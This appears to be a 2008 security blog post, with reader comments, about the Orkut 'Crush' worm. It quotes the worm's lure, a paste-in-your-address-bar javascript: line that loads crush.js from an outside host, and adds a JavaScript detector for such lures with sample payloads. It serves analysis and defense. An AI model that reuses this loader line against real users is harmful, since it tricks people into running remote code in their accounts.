Orkut “Crush” Worm
I’m a little behind the times, catching up on my email, but I thought I’d post this first since it’s probably some of the most interesting stuff. Keyshor just sent me an interesting snippet related to another Orkut worm that I’m affectionately calling “Crush” given the mode of transport, which is the Orkut crush. Here’s Keyshor’s email (cleaned up slightly):
This is the vulnerable scrap
Find out who has crush on u….
wait 4 few minutes after pressing enter
Author–> Coder http://www.orkut.com/Profile.aspx?uid=12437994075478369725>:)
Just copy the JavaScript, paste it in your address bar and PRESS ENTER
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://002292.googlepages.com/crush.js';void(0)
Trust me, ITS WORKING!!!
The site is down now, but I threw up the JavaScript source in the list of XSS worms so people could check it out. I was able to pull another version that was still alive here. Judging by the headers, it also appears that it may at one point have been a Greasemonkey plugin, which is an interesting way to debug your DHTML malware, I suppose. Anyway, great snippet for those who want to do some more analysis.
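A filter on scrap text can flag this kind of lure before it reaches other users. The following is an added example, not code from the original post or from Orkut; the function names, the `SITE_HOSTS` allowlist and the encoded and benign samples are assumptions constructed for illustration.

```javascript
// Added example: flag messages that ask the reader to paste a javascript: URI
// that injects a <script> element loaded from a host outside the site.
const SITE_HOSTS = new Set(['www.orkut.com']); // assumption: the site's own script hosts

function decodeLoose(s) {
  // The address bar percent-decodes a javascript: URI before running it.
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

function findPasteLures(message, siteHosts = SITE_HOSTS) {
  const findings = [];
  const scheme = /javascript\s*:\s*([^\r\n]+)/gi;
  let m;
  while ((m = scheme.exec(message)) !== null) {
    const payload = decodeLoose(m[1]);
    const createsScript = /createElement\s*\(\s*['"]script['"]\s*\)/i.test(payload);
    const offSiteHosts = [];
    for (const u of payload.match(/https?:\/\/[^\s'"<>)]+/gi) || []) {
      try {
        const host = new URL(u).hostname.toLowerCase();
        if (!siteHosts.has(host) && !offSiteHosts.includes(host)) offSiteHosts.push(host);
      } catch (e) { /* not a parseable URL, skip it */ }
    }
    // Flag only the combination: a script element plus an off-site URL.
    findings.push({ createsScript, offSiteHosts,
      loadsRemoteScript: createsScript && offSiteHosts.length > 0 });
  }
  return findings;
}

function isPasteLure(message) {
  return findPasteLures(message).some((f) => f.loadsRemoteScript);
}

// Samples: SCRAP is the lure quoted in the post; the other two are constructed.
const SCRAP = "Just copy the JavaScript, paste it in your address bar and PRESS ENTER " +
  "javascript:d=document;c=d.createElement('script');d.body.appendChild(c);" +
  "c.src='http://002292.googlepages.com/crush.js';void(0)";
const ENCODED = "javascript:c%3Ddocument.createElement(%22script%22)%3B" +
  "c.src%3D%22http%3A%2F%2Fcdn.example.test%2Fx.js%22";
const BENIGN = "I wrote a post about javascript: URIs and why they are risky.";

console.log(isPasteLure(SCRAP), isPasteLure(ENCODED), isPasteLure(BENIGN));
```

Matching on the script-element-plus-off-site-URL combination, rather than on the `javascript:` scheme alone, keeps ordinary discussion of the scheme from being flagged.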



February 28th, 2008 at 6:05 pm
Now, I don’t know how successful this was, but I’m going to assume it hit a fair few people.
So now we’ve finally reached the equivalent of those mass mailing worms where users have to download trojans; I honestly hope we don’t end up with an anti-javascript-virus solution which tries to match all the websites you view to common ‘malware’ such as this…
On the other hand if these ever get prolific, I wouldn’t be surprised if we did…
Protecting users from themselves seems to be the name of the game these days.
February 28th, 2008 at 7:20 pm
Viewing the XSS worm list makes Avast go insane. What’s going on? I’m going to have to use w3m to view that page. Agh. I’m on a work computer, thank god.
February 29th, 2008 at 2:02 am
LOL
This reminds me of that manual virus joke…
February 29th, 2008 at 5:50 am
Also available here:
http://userscripts.org/scripts/review/23071?format=txt
March 2nd, 2008 at 4:05 pm
“Just copy the JavaScript, paste it in your address bar and PRESS ENTER”… Since it’s in an XSS worms list, where is the XSS, may I ask?
March 3rd, 2008 at 8:11 am
@blah - funny, I thought you’d ask where the worm is, not where the XSS is, since the worm question is the only part that I think is pretty non-straightforward.
The XSS part is where you type something into your browser which requests an inclusion of a script from another domain and pulls it into the DOM for the page in question, which in this case is Orkut. Now that we all understand what XSS is….
I think this kind of XSS is pretty un-interesting in the same way I think Phishing is un-interesting but if people are still getting owned by it, it’s definitely worth mentioning, don’t you?
March 4th, 2008 at 7:50 am
Hah!
Please take a hammer and smash it into random parts of your computer, then proceed to mail me your credit card number. Trust me, IT’S WORKING!